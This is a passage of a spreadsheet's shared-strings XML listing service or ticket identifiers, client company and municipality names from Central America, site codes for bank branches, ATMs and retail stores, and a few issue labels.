    <t>INVERSIONES LIBERTY S.A.</t>
  </si>
  <si>
    <t>F4604162</t>
  </si>
  <si>
    <t>671900013T</t>
  </si>
  <si>
    <t>12700093T</t>
  </si>
  <si>
    <t>F4604165</t>
  </si>
  <si>
    <t>CC_WALMART_CR_TIENDA_831</t>
  </si>
  <si>
    <t>F4604194</t>
  </si>
  <si>
    <t>364100068T</t>
  </si>
  <si>
    <t>COLUMBUCS NETWORKS DE GUATEMALA LTDA.</t>
  </si>
  <si>
    <t>939759OH</t>
  </si>
  <si>
    <t>F4604201</t>
  </si>
  <si>
    <t>F4604210</t>
  </si>
  <si>
    <t>F4604211</t>
  </si>
  <si>
    <t>F4604212</t>
  </si>
  <si>
    <t>F4604213</t>
  </si>
  <si>
    <t>F4604223</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_ESTACA_SAN_BENITO</t>
  </si>
  <si>
    <t>F4604224</t>
  </si>
  <si>
    <t>F4604225</t>
  </si>
  <si>
    <t>F4604232</t>
  </si>
  <si>
    <t>F4604234</t>
  </si>
  <si>
    <t>F4604235</t>
  </si>
  <si>
    <t>F4604236</t>
  </si>
  <si>
    <t>F4604238</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_IPALA_MISION_ESTE</t>
  </si>
  <si>
    <t>F4604239</t>
  </si>
  <si>
    <t>IP2105130SV</t>
  </si>
  <si>
    <t>F4604255</t>
  </si>
  <si>
    <t>IP2383068SV</t>
  </si>
  <si>
    <t xml:space="preserve">INSTITUTO SALVADOREÑO DE TRANSFORMACION AGRARIA										</t>
  </si>
  <si>
    <t>F4570331</t>
  </si>
  <si>
    <t>64600043T</t>
  </si>
  <si>
    <t>ID1099131SV</t>
  </si>
  <si>
    <t>ENERGIA DESARROLLO Y CONSULTORIA SA DE CV</t>
  </si>
  <si>
    <t>F4570342</t>
  </si>
  <si>
    <t>F4570347</t>
  </si>
  <si>
    <t>F4570351</t>
  </si>
  <si>
    <t>625900139T</t>
  </si>
  <si>
    <t>F4570357</t>
  </si>
  <si>
    <t>F4570358</t>
  </si>
  <si>
    <t>917900001T</t>
  </si>
  <si>
    <t>GRANOS BÁSICOS DE CENTROAMÉRICA S.A.</t>
  </si>
  <si>
    <t>F4570366</t>
  </si>
  <si>
    <t>F4570367</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM_0530</t>
  </si>
  <si>
    <t>F4570370</t>
  </si>
  <si>
    <t>470100006T</t>
  </si>
  <si>
    <t>GS S.A.</t>
  </si>
  <si>
    <t>F4570375</t>
  </si>
  <si>
    <t>F4570376</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0458</t>
  </si>
  <si>
    <t>F4570383</t>
  </si>
  <si>
    <t>F4570385</t>
  </si>
  <si>
    <t>F4570390</t>
  </si>
  <si>
    <t>4597348ON</t>
  </si>
  <si>
    <t>ON0002550069/ALCALDIA MUNICIPAL DE CORN ISLAND-</t>
  </si>
  <si>
    <t>ID1087018SV</t>
  </si>
  <si>
    <t>ENERGIA ORGANICA S A DE C V</t>
  </si>
  <si>
    <t>F4570405</t>
  </si>
  <si>
    <t>F4570407</t>
  </si>
  <si>
    <t>ID1134051SV</t>
  </si>
  <si>
    <t>F4570437</t>
  </si>
  <si>
    <t>F4570442</t>
  </si>
  <si>
    <t>22842619SV</t>
  </si>
  <si>
    <t>CORPORATIVE SYSTEMS OF HEALTH S.A. DE C.V.</t>
  </si>
  <si>
    <t>5386218ON</t>
  </si>
  <si>
    <t>F4570448</t>
  </si>
  <si>
    <t>F4570453</t>
  </si>
  <si>
    <t>663233OH</t>
  </si>
  <si>
    <t>OH1000575918/UPS SOLUCIONES LOGISTICAS  -</t>
  </si>
  <si>
    <t>F4570454</t>
  </si>
  <si>
    <t>F4570455</t>
  </si>
  <si>
    <t>F4570456</t>
  </si>
  <si>
    <t>F4570464</t>
  </si>
  <si>
    <t>539600011T</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM4280</t>
  </si>
  <si>
    <t>CONTR0001809448OC</t>
  </si>
  <si>
    <t>806300403T</t>
  </si>
  <si>
    <t>F4563211</t>
  </si>
  <si>
    <t>F4563231</t>
  </si>
  <si>
    <t>F4563233</t>
  </si>
  <si>
    <t>397200030T</t>
  </si>
  <si>
    <t>313900347T</t>
  </si>
  <si>
    <t>F4563245</t>
  </si>
  <si>
    <t>90001909072T</t>
  </si>
  <si>
    <t>F4563265</t>
  </si>
  <si>
    <t>F4563266</t>
  </si>
  <si>
    <t>F4563268</t>
  </si>
  <si>
    <t>F4563270</t>
  </si>
  <si>
    <t>F4563274</t>
  </si>
  <si>
    <t>7800179T</t>
  </si>
  <si>
    <t>F4563299</t>
  </si>
  <si>
    <t>F4563301</t>
  </si>
  <si>
    <t>F4563319</t>
  </si>
  <si>
    <t>F4563321</t>
  </si>
  <si>
    <t>8902552T</t>
  </si>
  <si>
    <t>F4563336</t>
  </si>
  <si>
    <t>IP2145327SV</t>
  </si>
  <si>
    <t>F4563342</t>
  </si>
  <si>
    <t>IP2099277SV</t>
  </si>
  <si>
    <t>F4563352</t>
  </si>
  <si>
    <t>F4563354</t>
  </si>
  <si>
    <t>F4592515</t>
  </si>
  <si>
    <t>CC_WALMART_UTILITARIOS_GT_TIENDA_4086</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_0418</t>
  </si>
  <si>
    <t>F4592563</t>
  </si>
  <si>
    <t>F4592566</t>
  </si>
  <si>
    <t>F4592583</t>
  </si>
  <si>
    <t>F4592584</t>
  </si>
  <si>
    <t>F4592592</t>
  </si>
  <si>
    <t>F4592614</t>
  </si>
  <si>
    <t>F4592627</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_0460</t>
  </si>
  <si>
    <t>292900598T</t>
  </si>
  <si>
    <t>880600005T</t>
  </si>
  <si>
    <t>F4592678</t>
  </si>
  <si>
    <t>F4592679</t>
  </si>
  <si>
    <t>292900250T</t>
  </si>
  <si>
    <t>F4622851</t>
  </si>
  <si>
    <t>F4622852</t>
  </si>
  <si>
    <t>CC_WALMART_CR_TIENDA_3120</t>
  </si>
  <si>
    <t>26284900SV</t>
  </si>
  <si>
    <t>245700245T</t>
  </si>
  <si>
    <t>238700008T</t>
  </si>
  <si>
    <t>F4622868</t>
  </si>
  <si>
    <t>F4622877</t>
  </si>
  <si>
    <t>IP2105150SV</t>
  </si>
  <si>
    <t>F4622881</t>
  </si>
  <si>
    <t>26224300SV</t>
  </si>
  <si>
    <t>ALCALDIA MUNICIPAL DE SANTA ELENA</t>
  </si>
  <si>
    <t>F4622897</t>
  </si>
  <si>
    <t>F4622903</t>
  </si>
  <si>
    <t>F4622904</t>
  </si>
  <si>
    <t>271000001T</t>
  </si>
  <si>
    <t>EMUSA</t>
  </si>
  <si>
    <t>F4622905</t>
  </si>
  <si>
    <t>F4622906</t>
  </si>
  <si>
    <t>F4622912</t>
  </si>
  <si>
    <t>CC_AZTECA_GT_MALACATAN</t>
  </si>
  <si>
    <t>F4622923</t>
  </si>
  <si>
    <t>297401475T</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM2875</t>
  </si>
  <si>
    <t>F4622964</t>
  </si>
  <si>
    <t>F4622984</t>
  </si>
  <si>
    <t>F4622985</t>
  </si>
  <si>
    <t>F4623002</t>
  </si>
  <si>
    <t>CC_BAM_GT_AGENCIA_199</t>
  </si>
  <si>
    <t>F4623005</t>
  </si>
  <si>
    <t>F4622535</t>
  </si>
  <si>
    <t>ICXN-00070OC</t>
  </si>
  <si>
    <t>PROBLEMAS DE AUDIO</t>
  </si>
  <si>
    <t>1698722OH</t>
  </si>
  <si>
    <t>1699015OH</t>
  </si>
  <si>
    <t>F4622633</t>
  </si>
  <si>
    <t>F4622663</t>
  </si>
  <si>
    <t>90001910503T</t>
  </si>
  <si>
    <t>IP2031245SV</t>
  </si>
  <si>
    <t>38300480T</t>
  </si>
  <si>
    <t>483300004T</t>
  </si>
  <si>
    <t>F4622695</t>
  </si>
  <si>
    <t>CC_GYT_GT_AGENCIA_069</t>
  </si>
  <si>
    <t>927700008T</t>
  </si>
  <si>
    <t>25608300SV</t>
  </si>
  <si>
    <t>360 BEAUTY SUPPLY SA DE CV</t>
  </si>
  <si>
    <t>F4552449</t>
  </si>
  <si>
    <t>F4552451</t>
  </si>
  <si>
    <t>F4552452</t>
  </si>
  <si>
    <t>CC_PRONE_GT_Z12_COLONIA_MORZE</t>
  </si>
  <si>
    <t>F4552453</t>
  </si>
  <si>
    <t>CC_BANTRAB_GT_AGENCIA_38</t>
  </si>
  <si>
    <t>F4552457</t>
  </si>
  <si>
    <t>ID1028303SV</t>
  </si>
  <si>
    <t>F4552469</t>
  </si>
  <si>
    <t>CC_CREDOMATIC_GT_INTERNET_AG087</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_0780</t>
  </si>
  <si>
    <t>F4552477</t>
  </si>
  <si>
    <t>F4552478</t>
  </si>
  <si>
    <t>F4552481</t>
  </si>
  <si>
    <t>ID1064038SV</t>
  </si>
  <si>
    <t>441300031T</t>
  </si>
  <si>
    <t>F4552487</t>
  </si>
  <si>
    <t>F4552488</t>
  </si>
  <si>
    <t>F4552501</t>
  </si>
  <si>
    <t>1655904OH</t>
  </si>
  <si>
    <t>F4552504</t>
  </si>
  <si>
    <t>1655914OH</t>
  </si>
  <si>
    <t>F4552509</t>
  </si>
  <si>
    <t>290800022T</t>
  </si>
  <si>
    <t>F4552522</t>
  </si>
  <si>
    <t>90001904743T</t>
  </si>
  <si>
    <t>290800018T</t>
  </si>
  <si>
    <t>F4552529</t>
  </si>
  <si>
    <t>F4552534</t>
  </si>
  <si>
    <t>F4552540</t>
  </si>
  <si>
    <t>F4552544</t>
  </si>
  <si>
    <t>IP2105231SV</t>
  </si>
  <si>
    <t>F4552550</t>
  </si>
  <si>
    <t>F4552557</t>
  </si>
  <si>
    <t>8902402T</t>
  </si>
  <si>
    <t>F4552569</t>
  </si>
  <si>
    <t>758500321T</t>
  </si>
  <si>
    <t>F4579128</t>
  </si>
  <si>
    <t>671900138T</t>
  </si>
  <si>
    <t>F4579141</t>
  </si>
  <si>
    <t>CC_INVERSIONES_CENTROAMERICANAS_GT_CONDADO_CONCEPCION_GUATEF</t>
  </si>
  <si>
    <t>F4579146</t>
  </si>
  <si>
    <t>F4579194</t>
  </si>
  <si>
    <t>F4579234</t>
  </si>
  <si>
    <t>F4579235</t>
  </si>
  <si>
    <t>F4579237</t>
  </si>
  <si>
    <t>807900337T</t>
  </si>
  <si>
    <t>F4579243</t>
  </si>
  <si>
    <t>F4608901</t>
  </si>
  <si>
    <t>F4608908</t>
  </si>
  <si>
    <t>826900056T</t>
  </si>
  <si>
    <t>IP2165174SV</t>
  </si>
  <si>
    <t>IP2204075SV</t>
  </si>
  <si>
    <t>1744766OH</t>
  </si>
  <si>
    <t>OH1001084076</t>
  </si>
  <si>
    <t>F4608936</t>
  </si>
  <si>
    <t>CC_FENACOAC_GT_INTERNET_STA_LUCIA_UTATLAN_14</t>
  </si>
  <si>
    <t>F4608951</t>
  </si>
  <si>
    <t>CC_WALMART_CR_TIENDA_4000</t>
  </si>
  <si>
    <t>F4608962</t>
  </si>
  <si>
    <t>F4608963</t>
  </si>
  <si>
    <t>F4608964</t>
  </si>
  <si>
    <t>F4608965</t>
  </si>
  <si>
    <t>638100010T</t>
  </si>
  <si>
    <t>AEROPOST</t>
  </si>
  <si>
    <t>400000017T</t>
  </si>
  <si>
    <t>F4608985</t>
  </si>
  <si>
    <t>903100001T</t>
  </si>
  <si>
    <t>CONSULTORIA INTEGRATED SCREENING PARTNERS GUATEMALA Y COMPAÑÍA LIMIT</t>
  </si>
  <si>
    <t>CC_WALMART_CR_TIENDA_3038</t>
  </si>
  <si>
    <t>ID1383054SV</t>
  </si>
  <si>
    <t>ESAT S.A DE C.V</t>
  </si>
  <si>
    <t>F4608998</t>
  </si>
  <si>
    <t>F4609001</t>
  </si>
  <si>
    <t>F4609003</t>
  </si>
  <si>
    <t>CC_CREDOMATIC_GT_INTERNET_AGENCIA_0127</t>
  </si>
  <si>
    <t>20657669</t>
  </si>
  <si>
    <t>PROFESIONALES EN RECUPERACION SA</t>
  </si>
  <si>
    <t>F4609015</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_SAN_ISIDRO</t>
  </si>
  <si>
    <t>931500006T</t>
  </si>
  <si>
    <t>SISTEMAS DE PROTECCION AUTOMATIZADA S.A.</t>
  </si>
  <si>
    <t>ID1037208SV</t>
  </si>
  <si>
    <t>F4609033</t>
  </si>
  <si>
    <t>47503520T</t>
  </si>
  <si>
    <t>F4609037</t>
  </si>
  <si>
    <t>F4609038</t>
  </si>
  <si>
    <t>22043700SV</t>
  </si>
  <si>
    <t>RADTEC DE EL SALVADOR S.A. DE C.V.</t>
  </si>
  <si>
    <t>1746740OH</t>
  </si>
  <si>
    <t>OH1001084732</t>
  </si>
  <si>
    <t>F4538608</t>
  </si>
  <si>
    <t>F4571894</t>
  </si>
  <si>
    <t>F4571895</t>
  </si>
  <si>
    <t>F4571897</t>
  </si>
  <si>
    <t>F4571899</t>
  </si>
  <si>
    <t>364100048T</t>
  </si>
  <si>
    <t>F4571904</t>
  </si>
  <si>
    <t>1109643OH</t>
  </si>
  <si>
    <t>88900000T</t>
  </si>
  <si>
    <t>SANTA ROSA, S.A.</t>
  </si>
  <si>
    <t>61200196T</t>
  </si>
  <si>
    <t>F4571909</t>
  </si>
  <si>
    <t>F4571913</t>
  </si>
  <si>
    <t>F4571919</t>
  </si>
  <si>
    <t>47503901T</t>
  </si>
  <si>
    <t>F4571927</t>
  </si>
  <si>
    <t>F4571942</t>
  </si>
  <si>
    <t>F4571943</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM0199</t>
  </si>
  <si>
    <t>F4571950</t>
  </si>
  <si>
    <t>CC_DISTELSA_GT_PRADERA_CHIMALTENANGO</t>
  </si>
  <si>
    <t>271200009T</t>
  </si>
  <si>
    <t>F4571984</t>
  </si>
  <si>
    <t>IP2037201SV</t>
  </si>
  <si>
    <t>593400001T</t>
  </si>
  <si>
    <t>EL GRAN JAGUAR, S.A.</t>
  </si>
  <si>
    <t>F4571993</t>
  </si>
  <si>
    <t>F4571994</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM3349</t>
  </si>
  <si>
    <t>876900003T</t>
  </si>
  <si>
    <t>F4571997</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_0362</t>
  </si>
  <si>
    <t>F4572005</t>
  </si>
  <si>
    <t>8902327T</t>
  </si>
  <si>
    <t>F4572010</t>
  </si>
  <si>
    <t>F4572016</t>
  </si>
  <si>
    <t>F4572025</t>
  </si>
  <si>
    <t>F4572026</t>
  </si>
  <si>
    <t>F4572034</t>
  </si>
  <si>
    <t>F4572036</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM4548</t>
  </si>
  <si>
    <t>F4564445</t>
  </si>
  <si>
    <t>F4596912</t>
  </si>
  <si>
    <t>863400129T</t>
  </si>
  <si>
    <t>F4596916</t>
  </si>
  <si>
    <t>F4596920</t>
  </si>
  <si>
    <t>F4596924</t>
  </si>
  <si>
    <t>F4596925</t>
  </si>
  <si>
    <t>F4596926</t>
  </si>
  <si>
    <t>873200001T</t>
  </si>
  <si>
    <t>SALESLAND GUATEMALA, S.A.</t>
  </si>
  <si>
    <t>F4596950</t>
  </si>
  <si>
    <t>F4596957</t>
  </si>
  <si>
    <t>1010756OH</t>
  </si>
  <si>
    <t>IP2050025SV</t>
  </si>
  <si>
    <t>5508928ON</t>
  </si>
  <si>
    <t>839800003T</t>
  </si>
  <si>
    <t>F4596981</t>
  </si>
  <si>
    <t>F4596982</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0886</t>
  </si>
  <si>
    <t>F4596992</t>
  </si>
  <si>
    <t>F4596993</t>
  </si>
  <si>
    <t>5498915ON</t>
  </si>
  <si>
    <t>F4597017</t>
  </si>
  <si>
    <t>F4597018</t>
  </si>
  <si>
    <t>1342964OH</t>
  </si>
  <si>
    <t>770600052T</t>
  </si>
  <si>
    <t>F4597052</t>
  </si>
  <si>
    <t>F4597062</t>
  </si>
  <si>
    <t>F4597063</t>
  </si>
  <si>
    <t>F4552584</t>
  </si>
  <si>
    <t>F4552590</t>
  </si>
  <si>
    <t>F4552592</t>
  </si>
  <si>
    <t>F4552604</t>
  </si>
  <si>
    <t>47502893T</t>
  </si>
  <si>
    <t>F4552611</t>
  </si>
  <si>
    <t>949700001T</t>
  </si>
  <si>
    <t>AVICOLA VILLALOBOS, S.A. </t>
  </si>
  <si>
    <t>F4552632</t>
  </si>
  <si>
    <t>F4552636</t>
  </si>
  <si>
    <t>F4552650</t>
  </si>
  <si>
    <t>F4552663</t>
  </si>
  <si>
    <t>265900229T</t>
  </si>
  <si>
    <t>F4552683</t>
  </si>
  <si>
    <t>F4552687</t>
  </si>
  <si>
    <t>F4552689</t>
  </si>
  <si>
    <t>F4552692</t>
  </si>
  <si>
    <t>F4552694</t>
  </si>
  <si>
    <t>F4552708</t>
  </si>
  <si>
    <t>682200004T</t>
  </si>
  <si>
    <t>F4552728</t>
  </si>
  <si>
    <t>1320047OH</t>
  </si>
  <si>
    <t>OH1000702486/INGENIERIA GERENCIAL S A DE C V -</t>
  </si>
  <si>
    <t>F4581548</t>
  </si>
  <si>
    <t>F4581550</t>
  </si>
  <si>
    <t>916000027T</t>
  </si>
  <si>
    <t>ID1145181SV</t>
  </si>
  <si>
    <t>F4581560</t>
  </si>
  <si>
    <t>529300002T</t>
  </si>
  <si>
    <t>MEGA MATERIALES DE ANTIGUA S.A.</t>
  </si>
  <si>
    <t>F4581571</t>
  </si>
  <si>
    <t>F4581576</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM0970</t>
  </si>
  <si>
    <t>F4581585</t>
  </si>
  <si>
    <t>F4581586</t>
  </si>
  <si>
    <t>245700204T</t>
  </si>
  <si>
    <t>F4581598</t>
  </si>
  <si>
    <t>F4581606</t>
  </si>
  <si>
    <t>622700040T</t>
  </si>
  <si>
    <t>F4581625</t>
  </si>
  <si>
    <t>F4581627</t>
  </si>
  <si>
    <t>625900150T</t>
  </si>
  <si>
    <t>F4581647</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM3557</t>
  </si>
  <si>
    <t>F4581675</t>
  </si>
  <si>
    <t>8901957T</t>
  </si>
  <si>
    <t>F4609214</t>
  </si>
  <si>
    <t>933700001T</t>
  </si>
  <si>
    <t>ECODENA GUATEMALA Y COMPAÑÍA LIMITADA</t>
  </si>
  <si>
    <t>F4609226</t>
  </si>
  <si>
    <t>ID1026350SV</t>
  </si>
  <si>
    <t>343100055T</t>
  </si>
  <si>
    <t>343100056T</t>
  </si>
  <si>
    <t>F4609258</t>
  </si>
  <si>
    <t>F4609260</t>
  </si>
  <si>
    <t>F4609267</t>
  </si>
  <si>
    <t>F4609272</t>
  </si>
  <si>
    <t>F4609273</t>
  </si>
  <si>
    <t>F4609275</t>
  </si>
  <si>
    <t>F4609278</t>
  </si>
  <si>
    <t>F4609285</t>
  </si>
  <si>
    <t>8600199T</t>
  </si>
  <si>
    <t>ID1383113SV</t>
  </si>
  <si>
    <t>NAUTICA SA DE CV</t>
  </si>
  <si>
    <t>292900070T</t>
  </si>
  <si>
    <t>F4609306</t>
  </si>
  <si>
    <t>806300112T</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM_4834</t>
  </si>
  <si>
    <t>F4609318</t>
  </si>
  <si>
    <t>F4609325</t>
  </si>
  <si>
    <t>F4609326</t>
  </si>
  <si>
    <t>DESVIO CON PROBLEMA</t>
  </si>
  <si>
    <t>214800010T</t>
  </si>
  <si>
    <t>820000019T</t>
  </si>
  <si>
    <t>SONRIE, SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>TRASLADO NO COORDINADO</t>
  </si>
  <si>
    <t>233400023T</t>
  </si>
  <si>
    <t>F4609362</t>
  </si>
  <si>
    <t>F4609363</t>
  </si>
  <si>
    <t>F4575981</t>
  </si>
  <si>
    <t>392100043T</t>
  </si>
  <si>
    <t>F4575984</t>
  </si>
  <si>
    <t>758500181T</t>
  </si>
  <si>
    <t>598700022T</t>
  </si>
  <si>
    <t>F4575991</t>
  </si>
  <si>
    <t>ID1041054SV</t>
  </si>
  <si>
    <t>23472100SV</t>
  </si>
  <si>
    <t>ALCALDIA MUNICIPAL DE TEOTEPEQUE</t>
  </si>
  <si>
    <t>IP2350001SV</t>
  </si>
  <si>
    <t>CAJA DE CREDITO DE ZACATECOLUCA</t>
  </si>
  <si>
    <t>F4575998</t>
  </si>
  <si>
    <t>F4576000</t>
  </si>
  <si>
    <t>F4576005</t>
  </si>
  <si>
    <t>F4576014</t>
  </si>
  <si>
    <t>90001911341T</t>
  </si>
  <si>
    <t>573300001T</t>
  </si>
  <si>
    <t>INDUSTRIAS GRAFICAS DIAZ ALBIZUREZ, S.A.</t>
  </si>
  <si>
    <t>F4576028</t>
  </si>
  <si>
    <t>945700001T</t>
  </si>
  <si>
    <t>FONDO SOCIAL DE SOLIDARIDAD .</t>
  </si>
  <si>
    <t>807900031T</t>
  </si>
  <si>
    <t>F4576041</t>
  </si>
  <si>
    <t>47503226T</t>
  </si>
  <si>
    <t>245700081T</t>
  </si>
  <si>
    <t>F4576052</t>
  </si>
  <si>
    <t>8900613T</t>
  </si>
  <si>
    <t>F4576055</t>
  </si>
  <si>
    <t>F4576059</t>
  </si>
  <si>
    <t>603100001T</t>
  </si>
  <si>
    <t>SUPERINTENDENCIA DE BANCOS.</t>
  </si>
  <si>
    <t>F4576064</t>
  </si>
  <si>
    <t>8900658T</t>
  </si>
  <si>
    <t>5363020ON</t>
  </si>
  <si>
    <t>F4576079</t>
  </si>
  <si>
    <t>F4576084</t>
  </si>
  <si>
    <t>F4576085</t>
  </si>
  <si>
    <t>8900541T</t>
  </si>
  <si>
    <t>F4576090</t>
  </si>
  <si>
    <t>F4576092</t>
  </si>
  <si>
    <t>F4576093</t>
  </si>
  <si>
    <t>575700001T</t>
  </si>
  <si>
    <t>MISION TECNICA ALEMANA GIZ.</t>
  </si>
  <si>
    <t>1732528OH</t>
  </si>
  <si>
    <t>904100008T</t>
  </si>
  <si>
    <t>CONTR0002088629OC</t>
  </si>
  <si>
    <t>F4576117</t>
  </si>
  <si>
    <t>F4576119</t>
  </si>
  <si>
    <t>876598OH</t>
  </si>
  <si>
    <t>10500024T</t>
  </si>
  <si>
    <t>F4565998</t>
  </si>
  <si>
    <t>F4566004</t>
  </si>
  <si>
    <t>871100002T</t>
  </si>
  <si>
    <t>GRUPO INTERNACIONAL DC, S.A.</t>
  </si>
  <si>
    <t>893200006T</t>
  </si>
  <si>
    <t>265900030T</t>
  </si>
  <si>
    <t>356100005T</t>
  </si>
  <si>
    <t>F4566023</t>
  </si>
  <si>
    <t>833700001T</t>
  </si>
  <si>
    <t>EXTRACT, SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>22091000SV</t>
  </si>
  <si>
    <t>UNICOMER S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4566035</t>
  </si>
  <si>
    <t>620100001T</t>
  </si>
  <si>
    <t>DE TODO INTERNACIONAL, S.A.</t>
  </si>
  <si>
    <t>475562ON</t>
  </si>
  <si>
    <t>F4566050</t>
  </si>
  <si>
    <t>22544310SV</t>
  </si>
  <si>
    <t>MOLDEADOS SALVADOREÑOS S.A DE C.V</t>
  </si>
  <si>
    <t>349900221T</t>
  </si>
  <si>
    <t>917300011T</t>
  </si>
  <si>
    <t>F4566061</t>
  </si>
  <si>
    <t>CC_CAMPERO_GT_C108</t>
  </si>
  <si>
    <t>90001907126T</t>
  </si>
  <si>
    <t>F4566073</t>
  </si>
  <si>
    <t>F4566078</t>
  </si>
  <si>
    <t>F4566079</t>
  </si>
  <si>
    <t>F4566080</t>
  </si>
  <si>
    <t>22424862SV</t>
  </si>
  <si>
    <t>INCAPRO S.A DE C.V</t>
  </si>
  <si>
    <t>F4566089</t>
  </si>
  <si>
    <t>8200224T</t>
  </si>
  <si>
    <t>1655921OH</t>
  </si>
  <si>
    <t>1655923OH</t>
  </si>
  <si>
    <t>F4566103</t>
  </si>
  <si>
    <t>F4566104</t>
  </si>
  <si>
    <t>F4566108</t>
  </si>
  <si>
    <t>F4566109</t>
  </si>
  <si>
    <t>424200019T</t>
  </si>
  <si>
    <t>IP2037281SV</t>
  </si>
  <si>
    <t>S.A DE C.V LABORATORIOS BIOLOGICO</t>
  </si>
  <si>
    <t>47501637T</t>
  </si>
  <si>
    <t>F4566122</t>
  </si>
  <si>
    <t>C-0103103001XT</t>
  </si>
  <si>
    <t>3758055ON</t>
  </si>
  <si>
    <t>F4566135</t>
  </si>
  <si>
    <t>822400001T</t>
  </si>
  <si>
    <t>ZK SELECTIVA, SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>887000001T</t>
  </si>
  <si>
    <t>C.C.P.I. INFORMATICA</t>
  </si>
  <si>
    <t>F4601464</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM1195</t>
  </si>
  <si>
    <t>F4601465</t>
  </si>
  <si>
    <t>CC_APOYO_SV_USULUTAN</t>
  </si>
  <si>
    <t>F4601468</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0306</t>
  </si>
  <si>
    <t>F4601469</t>
  </si>
  <si>
    <t>F4601470</t>
  </si>
  <si>
    <t>F4601471</t>
  </si>
  <si>
    <t>OTROS UM</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM4860</t>
  </si>
  <si>
    <t>306700002T</t>
  </si>
  <si>
    <t>EMPAQUES Y COMPLEMENTOS S.A.</t>
  </si>
  <si>
    <t>22347000SV</t>
  </si>
  <si>
    <t>COMP.DE ING.ELECTRICISTAS S.A.DE C.V.</t>
  </si>
  <si>
    <t>284500027T</t>
  </si>
  <si>
    <t>F4601501</t>
  </si>
  <si>
    <t>318400026T</t>
  </si>
  <si>
    <t>F4601510</t>
  </si>
  <si>
    <t>F4601511</t>
  </si>
  <si>
    <t>F4601512</t>
  </si>
  <si>
    <t>F4601518</t>
  </si>
  <si>
    <t>F4601520</t>
  </si>
  <si>
    <t>F4601521</t>
  </si>
  <si>
    <t>F4601523</t>
  </si>
  <si>
    <t>F4601528</t>
  </si>
  <si>
    <t>90001910429T</t>
  </si>
  <si>
    <t>F4601532</t>
  </si>
  <si>
    <t>F4601534</t>
  </si>
  <si>
    <t>F4601535</t>
  </si>
  <si>
    <t>F4601536</t>
  </si>
  <si>
    <t>F4601541</t>
  </si>
  <si>
    <t>F4601542</t>
  </si>
  <si>
    <t>47503051T</t>
  </si>
  <si>
    <t>F4601543</t>
  </si>
  <si>
    <t>F4601549</t>
  </si>
  <si>
    <t>F4601557</t>
  </si>
  <si>
    <t>F4601562</t>
  </si>
  <si>
    <t>CC_UNICOMER_GT_EL_FRUTAL</t>
  </si>
  <si>
    <t>F4601564</t>
  </si>
  <si>
    <t>CC_DISTELSA_GT_INTERNET_MAZATENANGO_SUCHITEPEQUEZ</t>
  </si>
  <si>
    <t>F4601577</t>
  </si>
  <si>
    <t>1254710OH</t>
  </si>
  <si>
    <t>F4601595</t>
  </si>
  <si>
    <t>F4601598</t>
  </si>
  <si>
    <t>F4601599</t>
  </si>
  <si>
    <t>F4553104</t>
  </si>
  <si>
    <t>ASOCIACION CULTURAL Y SOCIO BENEFICA DE LOS HERMANOS MARISTAS DE GUATEMALA</t>
  </si>
  <si>
    <t>603700001T</t>
  </si>
  <si>
    <t>CIF-EMBAJADA DE ESPAÑA</t>
  </si>
  <si>
    <t>IP2391000SV</t>
  </si>
  <si>
    <t>1657665OH</t>
  </si>
  <si>
    <t>F4553120</t>
  </si>
  <si>
    <t>ID1346001SV</t>
  </si>
  <si>
    <t>ALCALDIA MUNICIPAL SAN JOSE/LA UNION</t>
  </si>
  <si>
    <t>F4553129</t>
  </si>
  <si>
    <t>F4553132</t>
  </si>
  <si>
    <t>758500426T</t>
  </si>
  <si>
    <t>F4553140</t>
  </si>
  <si>
    <t>F4553141</t>
  </si>
  <si>
    <t>F4553142</t>
  </si>
  <si>
    <t>758500178T</t>
  </si>
  <si>
    <t>1623013OH</t>
  </si>
  <si>
    <t>OH1000938087</t>
  </si>
  <si>
    <t>F4553149</t>
  </si>
  <si>
    <t>5222913ON</t>
  </si>
  <si>
    <t>F4553156</t>
  </si>
  <si>
    <t>CC_UNICOMER_GT_CC_EL_FRUTAL</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0298</t>
  </si>
  <si>
    <t>F4553159</t>
  </si>
  <si>
    <t>F4553160</t>
  </si>
  <si>
    <t>47502654T</t>
  </si>
  <si>
    <t>F4553166</t>
  </si>
  <si>
    <t>758500146T</t>
  </si>
  <si>
    <t>26191000SV</t>
  </si>
  <si>
    <t>MAGAÑA MERCADO S.A DE C.V</t>
  </si>
  <si>
    <t>F4553176</t>
  </si>
  <si>
    <t>F4553177</t>
  </si>
  <si>
    <t>758500343T</t>
  </si>
  <si>
    <t>825300023T</t>
  </si>
  <si>
    <t>1319861OH</t>
  </si>
  <si>
    <t>F4553193</t>
  </si>
  <si>
    <t>FG9149G</t>
  </si>
  <si>
    <t>F4553194</t>
  </si>
  <si>
    <t>FG9128G</t>
  </si>
  <si>
    <t>FG9152G</t>
  </si>
  <si>
    <t>FG9153G</t>
  </si>
  <si>
    <t>F4553197</t>
  </si>
  <si>
    <t>FG9151G</t>
  </si>
  <si>
    <t>F4553198</t>
  </si>
  <si>
    <t>FG9154G</t>
  </si>
  <si>
    <t>626200002T</t>
  </si>
  <si>
    <t>SANATORIO FAMILIAR S.A.</t>
  </si>
  <si>
